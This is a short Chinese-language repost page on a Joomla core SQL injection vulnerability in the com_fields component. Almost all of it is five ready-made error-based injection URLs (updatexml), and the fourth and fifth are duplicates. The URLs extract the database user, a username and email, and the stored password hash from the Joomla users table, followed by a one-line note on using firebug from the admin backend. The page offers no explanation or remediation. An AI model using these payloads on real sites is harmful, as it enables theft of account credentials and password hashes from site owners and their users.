joomla core注入漏洞

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了joomla core注入漏洞相关的知识,希望对你有一定的参考价值。

注入语句如下:

payload1 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)‘

payload2 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)‘

payload3 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)‘

payload4 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘

payload5 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘

 

访问后台使用firebug更改即可,记得加上用户名

以上是关于joomla core注入漏洞的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2018-8045 Joomla内核SQL注入漏洞

CVE-2018-8045 Joomla内核SQL注入漏洞

Joomla 3.9.13 二次注入分析(CVE-2019-19846)

ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞

带外通道Bind XML外部实体注入漏洞:PayPal案例研究

ThinkPHP 1.5.0 漏洞求助